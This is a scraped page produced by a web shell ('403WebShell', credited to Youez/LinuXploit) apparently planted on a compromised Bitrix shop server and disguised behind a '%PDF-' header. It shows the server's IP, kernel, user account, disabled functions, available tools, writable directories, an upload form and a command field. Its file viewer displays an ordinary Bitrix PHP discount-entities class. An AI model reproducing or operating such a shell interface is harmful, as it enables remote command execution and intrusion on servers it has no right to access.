%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.16.218.216
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/sale/lib/internals/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/sale/lib/internals/discountentities.php
<?php
namespace Bitrix\Sale\Internals;

use Bitrix\Main;
use Bitrix\Main\Application;
use Bitrix\Main\Localization\Loc;
Loc::loadMessages(__FILE__);

/**
 * Class DiscountEntitiesTable
 *
 * Fields:
 * <ul>
 * <li> ID int mandatory
 * <li> DISCOUNT_ID int mandatory
 * <li> MODULE_ID string(50) mandatory
 * <li> ENTITY string(255) mandatory
 * <li> FIELD_ENTITY string(255) mandatory
 * <li> FIELD_TABLE string(255) mandatory
 * </ul>
 *
 * @package Bitrix\Sale\Internals
 *
 * DO NOT WRITE ANYTHING BELOW THIS
 *
 * <<< ORMENTITYANNOTATION
 * @method static EO_DiscountEntities_Query query()
 * @method static EO_DiscountEntities_Result getByPrimary($primary, array $parameters = array())
 * @method static EO_DiscountEntities_Result getById($id)
 * @method static EO_DiscountEntities_Result getList(array $parameters = array())
 * @method static EO_DiscountEntities_Entity getEntity()
 * @method static \Bitrix\Sale\Internals\EO_DiscountEntities createObject($setDefaultValues = true)
 * @method static \Bitrix\Sale\Internals\EO_DiscountEntities_Collection createCollection()
 * @method static \Bitrix\Sale\Internals\EO_DiscountEntities wakeUpObject($row)
 * @method static \Bitrix\Sale\Internals\EO_DiscountEntities_Collection wakeUpCollection($rows)
 */

class DiscountEntitiesTable extends Main\Entity\DataManager
{
	/**
	 * Returns DB table name for entity.
	 *
	 * @return string
	 */
	public static function getTableName()
	{
		return 'b_sale_discount_entities';
	}

	/**
	 * Returns entity map definition.
	 *
	 * @return array
	 */
	public static function getMap()
	{
		return array(
			'ID' => new Main\Entity\IntegerField('ID', array(
				'primary' => true,
				'autocomplete' => true,
				'title' => Loc::getMessage('DISCOUNT_ENTITIES_ENTITY_ID_FIELD')
			)),
			'DISCOUNT_ID' => new Main\Entity\IntegerField('DISCOUNT_ID', array(
				'required' => true,
				'title' => Loc::getMessage('DISCOUNT_ENTITIES_ENTITY_DISCOUNT_ID_FIELD')
			)),
			'MODULE_ID' => new Main\Entity\StringField('MODULE_ID', array(
				'required' => true,
				'validation' => array(__CLASS__, 'validateModuleId'),
				'title' => Loc::getMessage('DISCOUNT_ENTITIES_ENTITY_MODULE_ID_FIELD')
			)),
			'ENTITY' => new Main\Entity\StringField('ENTITY', array(
				'required' => true,
				'validation' => array(__CLASS__, 'validateEntity'),
				'title' => Loc::getMessage('DISCOUNT_ENTITIES_ENTITY_ENTITY_FIELD')
			)),
			'FIELD_ENTITY' => new Main\Entity\StringField('FIELD_ENTITY', array(
				'required' => true,
				'validation' => array(__CLASS__, 'validateFieldEntity'),
				'title' => Loc::getMessage('DISCOUNT_ENTITIES_ENTITY_FIELD_ENTITY_FIELD')
			)),
			'FIELD_TABLE' => new Main\Entity\StringField('FIELD_TABLE', array(
				'required' => true,
				'validation' => array(__CLASS__, 'validateFieldTable'),
				'title' => Loc::getMessage('DISCOUNT_ENTITIES_ENTITY_FIELD_TABLE_FIELD'),
			)),
			'DISCOUNT' => new Main\Entity\ReferenceField(
				'DISCOUNT',
				'Bitrix\Sale\Internals\Discount',
				array('=this.DISCOUNT_ID' => 'ref.ID'),
				array('join_type' => 'LEFT')
			)
		);
	}
	/**
	 * Returns validators for MODULE_ID field.
	 *
	 * @return array
	 */
	public static function validateModuleId()
	{
		return array(
			new Main\Entity\Validator\Length(null, 50),
		);
	}
	/**
	 * Returns validators for ENTITY field.
	 *
	 * @return array
	 */
	public static function validateEntity()
	{
		return array(
			new Main\Entity\Validator\Length(null, 255),
		);
	}
	/**
	 * Returns validators for FIELD_ENTITY field.
	 *
	 * @return array
	 */
	public static function validateFieldEntity()
	{
		return array(
			new Main\Entity\Validator\Length(null, 255),
		);
	}
	/**
	 * Returns validators for FIELD_TABLE field.
	 *
	 * @return array
	 */
	public static function validateFieldTable()
	{
		return array(
			new Main\Entity\Validator\Length(null, 255),
		);
	}

	/**
	 * Delete entity list by discount.
	 *
	 * @param int $discount			Discount id.
	 * @return void
	 */
	public static function deleteByDiscount($discount)
	{
		$discount = (int)$discount;
		if ($discount <= 0)
			return;
		$conn = Application::getConnection();
		$helper = $conn->getSqlHelper();
		$conn->queryExecute(
			'delete from '.$helper->quote(self::getTableName()).' where '.$helper->quote('DISCOUNT_ID').' = '.$discount
		);
	}

	/**
	 * Update entity list by discount.
	 *
	 * @param int $discount				Discount id.
	 * @param array $entityList			Discount entity list.
	 * @param bool $clear				Clear old values.
	 * @return bool
	 */
	public static function updateByDiscount($discount, $entityList, $clear)
	{
		$discount = (int)$discount;
		if ($discount <= 0)
			return false;
		$clear = ($clear === true);
		if ($clear)
		{
			self::deleteByDiscount($discount);
		}
		if (!empty($entityList) && is_array($entityList))
		{
			foreach ($entityList as &$entity)
			{
				$fields = array(
					'DISCOUNT_ID' => $discount,
					'MODULE_ID' => $entity['MODULE'],
					'ENTITY' => $entity['ENTITY'],
					'FIELD_ENTITY' => $entity['FIELD_ENTITY'],
				);
				if (is_array($fields['FIELD_ENTITY']))
					$fields['FIELD_ENTITY'] = implode('-', $fields['FIELD_ENTITY']);
				if (isset($entity['FIELD_TABLE']) && is_array($entity['FIELD_TABLE']))
				{
					foreach ($entity['FIELD_TABLE'] as $oneField)
					{
						if (empty($oneField))
							continue;
						$fields['FIELD_TABLE'] = $oneField;
						$result = self::add($fields);
					}
					unset($oneField);
				}
				else
				{
					$fields['FIELD_TABLE'] = (isset($entity['FIELD_TABLE']) ? $entity['FIELD_TABLE'] : $entity['FIELD_ENTITY']);
					$result = self::add($fields);
				}
			}
			unset($entity);
		}
		return true;
	}

	/**
	 * Return entity by discount list.
	 *
	 * @param array $discountList			Discount id list.
	 * @param array $filter				Additional filter.
	 * @param bool $groupModule			Group by modules.
	 * @return array
	 */
	public static function getByDiscount($discountList, $filter = array(), $groupModule = true)
	{
		$groupModule = ($groupModule === true);
		$result = array();
		if (!empty($discountList) && is_array($discountList))
		{
			Main\Type\Collection::normalizeArrayValuesByInt($discountList);
			if (!empty($discountList))
			{
				if (!is_array($filter))
					$filter = array();

				$discountRows = array_chunk($discountList, 500);
				foreach ($discountRows as &$row)
				{
					$filter['@DISCOUNT_ID'] = $row;

					$entityIterator = self::getList(array(
						'select' => array('DISCOUNT_ID', 'MODULE_ID', 'ENTITY', 'FIELD_ENTITY', 'FIELD_TABLE'),
						'filter' => $filter
					));
					if ($groupModule)
					{
						while ($entity = $entityIterator->fetch())
						{
							unset($entity['DISCOUNT_ID']);
							if (!isset($result[$entity['MODULE_ID']]))
								$result[$entity['MODULE_ID']] = array();
							if (!isset($result[$entity['MODULE_ID']][$entity['ENTITY']]))
								$result[$entity['MODULE_ID']][$entity['ENTITY']] = array();
							$result[$entity['MODULE_ID']][$entity['ENTITY']][$entity['FIELD_ENTITY']] = $entity;
						}
					}
					else
					{
						while ($entity = $entityIterator->fetch())
						{
							$entity['DISCOUNT_ID'] = (int)$entity['DISCOUNT_ID'];
							if (!isset($result[$entity['DISCOUNT_ID']]))
								$result[$entity['DISCOUNT_ID']] = array();
							$result[$entity['DISCOUNT_ID']][] = $entity;
						}
					}
					unset($entity, $entityIterator);
				}
				unset($row, $discountRows);
			}
		}
		return $result;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit